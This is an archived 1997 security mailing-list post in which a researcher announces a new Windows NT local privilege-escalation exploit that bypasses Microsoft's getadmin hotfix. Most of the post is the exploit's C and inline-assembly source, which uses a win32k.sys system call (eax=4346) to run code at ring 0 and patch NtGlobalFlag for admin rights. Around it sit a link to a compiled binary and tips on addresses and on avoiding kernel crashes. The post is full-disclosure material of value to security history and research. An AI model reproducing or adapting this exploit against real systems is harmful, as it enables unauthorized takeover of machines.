It's not over yet.

Aleph One (aleph1@DFW.NET)
Fri, 11 Jul 1997 03:45:18 -0500

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Manley, Jim W: "(no subject)"
Previous message: Martin Pool: "Re: Vulnerability in Glimpse HTTP"

From: Costin RAIU <craiu@gecad.ro>
Subject: [NTSEC] It's not over yet.

Hi everyone,

We all know Microsoft released the getadmin hotfix.
However after a few hours of work, I was able to create a
new exploit which also works with this patch Microsoft just
realeased.

The problem is now in eax=4346 which is handled somewhere in
win32k.sys.
There are more (I found 4) vulnerable functions, but not so interesting
like this one. By calling the function in a special way, you can
get your own code get executed at ring 0 privilege. My program will
simply change the byte of NtGlobalFlag to the DEBUG value, so you
can run GetAdmin (which after the fix is not working anymore).
Since compiling the source is very difficult, the compiled binary
is avaible at http://www.gecad.ro/~craiu/cr4.exe
This program was tested on 2 Windows NT patched machines, and worked
ok. (I got the Admin rights)

Here's the source of my program:

Run user code at ring 0
Author: Costin RAIU <craiu@gecad.ro>

*/
void* a[2];

void main(void) {
int i;
for (i=0;i<2;i++) a[i]=(void*)0;
*(char*)(0x4080a4)=0x80; //or bptr [NtGlobalFlag+2],c1h
*(char*)(0x4080a5)=0x0d;
*(char*)(0x4080a6)=0xb6;
*(char*)(0x4080a7)=0xc2;
*(char*)(0x4080a8)=0x14;
*(char*)(0x4080a9)=0x80;
*(char*)(0x4080aa)=0xc1;
*(char*)(0x4080ab)=0xcf;

_asm
{
mov eax,4346
mov edx,offset a
int 2eh
}

}

Due to the nature of this bug, is very important the address of
the mov eax,4346 instruction must be 004080a4. I am not an
expert in the PE structure, but my cr4.exe program will always
run at that address on my test machine. An assembler version
might be very interesting, but there are other things to do
now. (like checking eax=187) If any of you guys has better assembler
skills, I would like to see a nice asm version of my program.
OBJE: 4080a4 is somewhere in the program space, but it is not
used (debug info/data space etc...) You can probably conroll
the address of the retf (which btw. it is located at
a0020b87h)
After doing the "or" instruction, and IRETD is required to
continue the execution of the function, otherwise the kernel will
crash.

bye,
c0s

Costin RAIU, Data Security Expert

E-MAIL : BUSINESS mailto:craiu@gecad.ro, PERSONAL craiu@usa.net
PGP Key : http://www.gecad.ro/~craiu/craiu.asc (or search www.pgp.com)
KeyID : 2048/DD35A295 Costin RAIU <craiu@gecad.ro>
Key fingerprint = FD 14 2A 90 64 41 58 9A 6B 34 47 D8 C5 E2 F4 5C

Next message: Manley, Jim W: "(no subject)"
Previous message: Martin Pool: "Re: Vulnerability in Glimpse HTTP"